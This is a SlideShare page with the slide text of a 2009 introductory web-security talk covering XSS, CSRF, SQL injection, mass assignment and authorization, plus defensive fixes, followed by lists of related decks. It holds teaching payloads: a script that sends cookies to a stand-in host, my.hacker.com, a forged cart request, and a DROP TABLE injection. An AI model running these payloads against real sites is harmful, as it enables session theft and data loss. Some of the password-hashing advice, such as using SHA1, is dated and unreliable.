SlideShare a Scribd company logo

2009 Barcamp Nashville Web Security 101

Download as ODP, PDF
B
brian_dailey

A super-brief (25 minute) talk on the basics of web security. A video (with poor audio that doesn't kick in until 9 minutes in, I'm sorry) is available here: http://www.ustream.tv/recorded/2369801

Technology
1 of 30
Web Security 101
Who is this guy? Brian Dailey realm3 web applications
Security is serious.
Even when you might think it's not.
TRUST ME Security is all about trust.
Physical Network Server Application
XSS The user believes you are this guy: But this guy is really watching:
XSS: Methods Non-persistent: Entice user to load page (either by clicking a link or a hidden frame) and inject client-side script. Persistent: Save to the database and get users to load the page with the client-side script.
XSS Give me back my session! <script> document.write('<img src=” http://my.hacker.com/ me.php?cookie=' + document.cookie + '” width=”1” height=”1” />'); </script>
XSS Another example: Embed a form that captures a saved password, collect it. If you can inject Javascript or HTML, you can do all sorts of nefarious things.
XSS Prevention Always Escape Output How you escape depends upon context. ,[object Object]
HTML Entities
White listing HTML tags (black listing is tricky!)
CSRF (Cross-site Request Forgery) Exploit server's trust of user.
CSRF You think this is your user: But really it is:
CSRF Example: <img src=” http://your.site.com/addtocart.php?item-id=12&ship_to=l33t_haxor ” height=”1” width=”1” /> Works especially well with GET requests, but using POST is not a surefire way to prevent this.
CSRF Prevention Techniques Authorize each user action. Don't use GET when modifying data.
SQL Injection
SQL Injection String sql = “SELECT * FROM users WHERE name LIKE '%” + name + “'”; http://www.subgenius.com/person.jsp?name=foobar ”;+DROP+TABLE+USERS--
SQL Injection Prevention This one is pretty easy: use parameterized statements. (You could also escape control characters, but there are issues with that.) String sql = &quot;SELECT * FROM users WHERE name LIKE ?&quot;; java.sql.PreparedStatement stmt = Conn.prepareStatement(sql); stmt.setString(1, request.getParameter(&quot;name&quot;));
Frameworks are helpful.
They can come with their own set of issues.
Mass Assignment
Mass Assignment Rails Example: @user = User.find(current_user.id) @user.update_attributes(params[:user]) If I POST user[is_admin] = 1 W00t! I pwned u! Fix by using attr_accessible (in model) or by whitelisting. http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
Mass Assignment Symfony: If you're using Forms, you're not vulnerable. (Kudos to Symfony.) CakePHP: # Anything about $this->data could be changed! # This makes me sad. $this->Post->save($this->data);
Ownership
Ownership Authorization Rails: # bad @post = Post.find(params[:id]) # good @post = current_user.posts.find(params[:id])
Ownership Authorization CakePHP: // bad $post = $this->Post->findById($id); // good $post = $this->Post->find( array('conditions' => array( 'id' => $id, 'user_id' => $this->Auth->user('id'), ) );
Ownership Authorization Symfony: // bad $post = Doctrine::getTable('Post')->find($id); // good $post = Doctrine_Query::create() ->select('*') ->from('Post p') ->where('p.id = ?', $id) ->where('p.user_id = ?', $user_id );
Other Considerations > Rate limit user login attempts to prevent brute-force attacks. + Use caching (memcache) to track attempts. > Always apply hash to user passwords + Md5 is no good, use Sha1, Sha256 & Salt Useful Resources Potential Attacks Overview (OWASP has a ton of info!) http://www.owasp.org/index.php/Category:Attack Google Code University on Web Security http://code.google.com/edu/security/index.html Rails Security Guide http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide

Recommended

Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
 
Djangoアプリのデプロイに関するプラクティス / Deploy django application
Djangoアプリのデプロイに関するプラクティス / Deploy django applicationDjangoアプリのデプロイに関するプラクティス / Deploy django application
Djangoアプリのデプロイに関するプラクティス / Deploy django application
Masashi Shibata
 
Django の認証処理実装パターン / Django Authentication Patterns
Django の認証処理実装パターン / Django Authentication PatternsDjango の認証処理実装パターン / Django Authentication Patterns
Django の認証処理実装パターン / Django Authentication Patterns
Masashi Shibata
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter Apps
Damon Cortesi
 
Web Security
Web SecurityWeb Security
Web Security
Rene Churchill
 
PHP Security
PHP SecurityPHP Security
PHP Security
manugoel2003
 
Secure Coding With Wordpress (BarCamp Orlando 2009)
Secure Coding With Wordpress (BarCamp Orlando 2009)Secure Coding With Wordpress (BarCamp Orlando 2009)
Secure Coding With Wordpress (BarCamp Orlando 2009)
Mark Jaquith
 

Recommended

Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
 
Djangoアプリのデプロイに関するプラクティス / Deploy django application
Djangoアプリのデプロイに関するプラクティス / Deploy django applicationDjangoアプリのデプロイに関するプラクティス / Deploy django application
Djangoアプリのデプロイに関するプラクティス / Deploy django application
Masashi Shibata
 
Django の認証処理実装パターン / Django Authentication Patterns
Django の認証処理実装パターン / Django Authentication PatternsDjango の認証処理実装パターン / Django Authentication Patterns
Django の認証処理実装パターン / Django Authentication Patterns
Masashi Shibata
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter Apps
Damon Cortesi
 
Web Security
Web SecurityWeb Security
Web Security
Rene Churchill
 
PHP Security
PHP SecurityPHP Security
PHP Security
manugoel2003
 
Secure Coding With Wordpress (BarCamp Orlando 2009)
Secure Coding With Wordpress (BarCamp Orlando 2009)Secure Coding With Wordpress (BarCamp Orlando 2009)
Secure Coding With Wordpress (BarCamp Orlando 2009)
Mark Jaquith
 
Advanced and Hidden WordPress APIs
Advanced and Hidden WordPress APIsAdvanced and Hidden WordPress APIs
Advanced and Hidden WordPress APIs
andrewnacin
 
Getting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your WebappGetting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your Webapp
Francois Marier
 
Embracing Capybara
Embracing CapybaraEmbracing Capybara
Embracing Capybara
Tim Moore
 
Functional testing with capybara
Functional testing with capybaraFunctional testing with capybara
Functional testing with capybara
koffeinfrei
 
PHP security audits
PHP security auditsPHP security audits
PHP security audits
Damien Seguy
 
PHP Security
PHP SecurityPHP Security
PHP Security
Mindfire Solutions
 
Php Security
Php SecurityPhp Security
Php Securityguest7cf35c
 
Rails 3: Dashing to the Finish
Rails 3: Dashing to the FinishRails 3: Dashing to the Finish
Rails 3: Dashing to the FinishYehuda Katz
 
Document
DocumentDocument
Documentviwviw
 
Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013
Mike West
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
jessepollak
 
2013-06-25 - HTML5 & JavaScript Security
2013-06-25 - HTML5 & JavaScript Security2013-06-25 - HTML5 & JavaScript Security
2013-06-25 - HTML5 & JavaScript Security
Johannes Hoppe
 
Web Security
Web SecurityWeb Security
Web Security
Supankar Banik
 
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Masashi Shibata
 
How not to suck at Cyber Security
How not to suck at Cyber SecurityHow not to suck at Cyber Security
How not to suck at Cyber SecurityChris Watts
 
สปริงเฟรมเวิร์ค4.1
สปริงเฟรมเวิร์ค4.1สปริงเฟรมเวิร์ค4.1
สปริงเฟรมเวิร์ค4.1ทวิร พานิชสมบัติ
 
XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2
Abhishek Kumar
 
Google analyticspresncsuwebdev
Google analyticspresncsuwebdevGoogle analyticspresncsuwebdev
Google analyticspresncsuwebdevNick Young
 
AWS Elastic Beanstalk
AWS Elastic BeanstalkAWS Elastic Beanstalk
AWS Elastic Beanstalk
Amazon Web Services
 
Taking the pain out of signing users in
Taking the pain out of signing users inTaking the pain out of signing users in
Taking the pain out of signing users inFrancois Marier
 
FISL 2012 Prezo
FISL 2012 PrezoFISL 2012 Prezo
FISL 2012 Prezochefhja
 
Introducing Cds Power Point Show
Introducing Cds Power Point ShowIntroducing Cds Power Point Show
Introducing Cds Power Point Show
DRSeys
 

More Related Content

What's hot

Advanced and Hidden WordPress APIs
Advanced and Hidden WordPress APIsAdvanced and Hidden WordPress APIs
Advanced and Hidden WordPress APIs
andrewnacin
 
Getting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your WebappGetting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your Webapp
Francois Marier
 
Embracing Capybara
Embracing CapybaraEmbracing Capybara
Embracing Capybara
Tim Moore
 
Functional testing with capybara
Functional testing with capybaraFunctional testing with capybara
Functional testing with capybara
koffeinfrei
 
PHP security audits
PHP security auditsPHP security audits
PHP security audits
Damien Seguy
 
PHP Security
PHP SecurityPHP Security
PHP Security
Mindfire Solutions
 
Rails 3: Dashing to the Finish
Rails 3: Dashing to the FinishRails 3: Dashing to the Finish
Rails 3: Dashing to the FinishYehuda Katz
 
Document
DocumentDocument
Documentviwviw
 
Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013
Mike West
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
jessepollak
 
2013-06-25 - HTML5 & JavaScript Security
2013-06-25 - HTML5 & JavaScript Security2013-06-25 - HTML5 & JavaScript Security
2013-06-25 - HTML5 & JavaScript Security
Johannes Hoppe
 
Web Security
Web SecurityWeb Security
Web Security
Supankar Banik
 
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Masashi Shibata
 
How not to suck at Cyber Security
How not to suck at Cyber SecurityHow not to suck at Cyber Security
How not to suck at Cyber SecurityChris Watts
 
XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2
Abhishek Kumar
 
Google analyticspresncsuwebdev
Google analyticspresncsuwebdevGoogle analyticspresncsuwebdev
Google analyticspresncsuwebdevNick Young
 
AWS Elastic Beanstalk
AWS Elastic BeanstalkAWS Elastic Beanstalk
AWS Elastic Beanstalk
Amazon Web Services
 
Taking the pain out of signing users in
Taking the pain out of signing users inTaking the pain out of signing users in
Taking the pain out of signing users inFrancois Marier
 

What's hot (20)

Advanced and Hidden WordPress APIs
Advanced and Hidden WordPress APIsAdvanced and Hidden WordPress APIs
Advanced and Hidden WordPress APIs
 
Getting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your WebappGetting Browsers to Improve the Security of Your Webapp
Getting Browsers to Improve the Security of Your Webapp
 
Embracing Capybara
Embracing CapybaraEmbracing Capybara
Embracing Capybara
 
Functional testing with capybara
Functional testing with capybaraFunctional testing with capybara
Functional testing with capybara
 
PHP security audits
PHP security auditsPHP security audits
PHP security audits
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
Php Security
Php SecurityPhp Security
Php Security
 
Rails 3: Dashing to the Finish
Rails 3: Dashing to the FinishRails 3: Dashing to the Finish
Rails 3: Dashing to the Finish
 
Document
DocumentDocument
Document
 
Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013Mitigate Maliciousness -- jQuery Europe 2013
Mitigate Maliciousness -- jQuery Europe 2013
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
 
2013-06-25 - HTML5 & JavaScript Security
2013-06-25 - HTML5 & JavaScript Security2013-06-25 - HTML5 & JavaScript Security
2013-06-25 - HTML5 & JavaScript Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018Django REST Framework における API 実装プラクティス | PyCon JP 2018
Django REST Framework における API 実装プラクティス | PyCon JP 2018
 
How not to suck at Cyber Security
How not to suck at Cyber SecurityHow not to suck at Cyber Security
How not to suck at Cyber Security
 
สปริงเฟรมเวิร์ค4.1
สปริงเฟรมเวิร์ค4.1สปริงเฟรมเวิร์ค4.1
สปริงเฟรมเวิร์ค4.1
 
XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2
 
Google analyticspresncsuwebdev
Google analyticspresncsuwebdevGoogle analyticspresncsuwebdev
Google analyticspresncsuwebdev
 
AWS Elastic Beanstalk
AWS Elastic BeanstalkAWS Elastic Beanstalk
AWS Elastic Beanstalk
 
Taking the pain out of signing users in
Taking the pain out of signing users inTaking the pain out of signing users in
Taking the pain out of signing users in
 

Viewers also liked

FISL 2012 Prezo
FISL 2012 PrezoFISL 2012 Prezo
FISL 2012 Prezochefhja
 
Introducing Cds Power Point Show
Introducing Cds Power Point ShowIntroducing Cds Power Point Show
Introducing Cds Power Point Show
DRSeys
 
MBSI relationship marketing infographic
MBSI relationship marketing infographicMBSI relationship marketing infographic
MBSI relationship marketing infographic
RE/MAX Equity Group
 
Mobile Payments
Mobile PaymentsMobile Payments
Mobile Payments
Sudhakar Mishra
 
India's gift to_the_world
India's gift to_the_worldIndia's gift to_the_world
India's gift to_the_worldRajesh Goyal
 
Lessons in Website Management for PR Pros - PRSA Southwest District Conference
Lessons in Website Management for PR Pros - PRSA Southwest District ConferenceLessons in Website Management for PR Pros - PRSA Southwest District Conference
Lessons in Website Management for PR Pros - PRSA Southwest District ConferenceCaitlin Jeansonne
 
autozone AZOAR2006PDF
autozone AZOAR2006PDFautozone AZOAR2006PDF
autozone AZOAR2006PDFfinance46
 
CS/IT: Where Content and Technology Meet
CS/IT: Where Content and Technology MeetCS/IT: Where Content and Technology Meet
CS/IT: Where Content and Technology MeetLaura Blaydon
 
Saving Petrol Some Tips
Saving Petrol Some TipsSaving Petrol Some Tips
Saving Petrol Some Tips
Rajesh Goyal
 
Light Filled Living
Light Filled LivingLight Filled Living
Light Filled Living
stwordsmith
 
アニメの公式アカウントのフォロワー数をつぶやくTwitterボットを作ってみた
アニメの公式アカウントのフォロワー数をつぶやくTwitterボットを作ってみたアニメの公式アカウントのフォロワー数をつぶやくTwitterボットを作ってみた
アニメの公式アカウントのフォロワー数をつぶやくTwitterボットを作ってみた
Yoshitake Takata
 
Конкурентный контент анализ 2005
Конкурентный контент анализ 2005Конкурентный контент анализ 2005
Конкурентный контент анализ 2005
Vadim Andreev
 
jose juan
jose juanjose juan
jose juan
guest5653c8
 
The Venture Capital Method
The Venture Capital MethodThe Venture Capital Method
The Venture Capital Method
finanzas_uca
 
Terrassa
TerrassaTerrassa
Terrassa
trinamilan
 
hormel foods 2004_Proxy
hormel foods 2004_Proxyhormel foods 2004_Proxy
hormel foods 2004_Proxyfinance46
 
East Meets West
East Meets WestEast Meets West
East Meets West
stwordsmith
 
Horizon College 31012011
Horizon College 31012011Horizon College 31012011
Horizon College 31012011
Johan Lapidaire
 

Viewers also liked (20)

FISL 2012 Prezo
FISL 2012 PrezoFISL 2012 Prezo
FISL 2012 Prezo
 
Introducing Cds Power Point Show
Introducing Cds Power Point ShowIntroducing Cds Power Point Show
Introducing Cds Power Point Show
 
MBSI relationship marketing infographic
MBSI relationship marketing infographicMBSI relationship marketing infographic
MBSI relationship marketing infographic
 
Mobile Payments
Mobile PaymentsMobile Payments
Mobile Payments
 
Losh
LoshLosh
Losh
 
India's gift to_the_world
India's gift to_the_worldIndia's gift to_the_world
India's gift to_the_world
 
Lessons in Website Management for PR Pros - PRSA Southwest District Conference
Lessons in Website Management for PR Pros - PRSA Southwest District ConferenceLessons in Website Management for PR Pros - PRSA Southwest District Conference
Lessons in Website Management for PR Pros - PRSA Southwest District Conference
 
autozone AZOAR2006PDF
autozone AZOAR2006PDFautozone AZOAR2006PDF
autozone AZOAR2006PDF
 
CS/IT: Where Content and Technology Meet
CS/IT: Where Content and Technology MeetCS/IT: Where Content and Technology Meet
CS/IT: Where Content and Technology Meet
 
Saving Petrol Some Tips
Saving Petrol Some TipsSaving Petrol Some Tips
Saving Petrol Some Tips
 
Light Filled Living
Light Filled LivingLight Filled Living
Light Filled Living
 
アニメの公式アカウントのフォロワー数をつぶやくTwitterボットを作ってみた
アニメの公式アカウントのフォロワー数をつぶやくTwitterボットを作ってみたアニメの公式アカウントのフォロワー数をつぶやくTwitterボットを作ってみた
アニメの公式アカウントのフォロワー数をつぶやくTwitterボットを作ってみた
 
Конкурентный контент анализ 2005
Конкурентный контент анализ 2005Конкурентный контент анализ 2005
Конкурентный контент анализ 2005
 
jose juan
jose juanjose juan
jose juan
 
The Venture Capital Method
The Venture Capital MethodThe Venture Capital Method
The Venture Capital Method
 
Terrassa
TerrassaTerrassa
Terrassa
 
My pet
My petMy pet
My pet
 
hormel foods 2004_Proxy
hormel foods 2004_Proxyhormel foods 2004_Proxy
hormel foods 2004_Proxy
 
East Meets West
East Meets WestEast Meets West
East Meets West
 
Horizon College 31012011
Horizon College 31012011Horizon College 31012011
Horizon College 31012011
 

Similar to 2009 Barcamp Nashville Web Security 101

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Damon Cortesi
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
Dave Ross
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
Mahmud Ahsan
 
Php Security3895
Php Security3895Php Security3895
Php Security3895Aung Khant
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Rails and security
Rails and securityRails and security
Rails and security
Andrey Tokarchuk
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Client
grutz
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007Aung Khant
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
OSSCube
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Stuart Colville
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 

Similar to 2009 Barcamp Nashville Web Security 101 (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
 
Php security3895
Php security3895Php security3895
Php security3895
 
Php Security3895
Php Security3895Php Security3895
Php Security3895
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Rails and security
Rails and securityRails and security
Rails and security
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Client
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007
 
Hacking - Web based attacks
Hacking - Web based attacksHacking - Web based attacks
Hacking - Web based attacks
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 

Recently uploaded

By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
nkrafacyberclub
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 

Recently uploaded (20)

By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
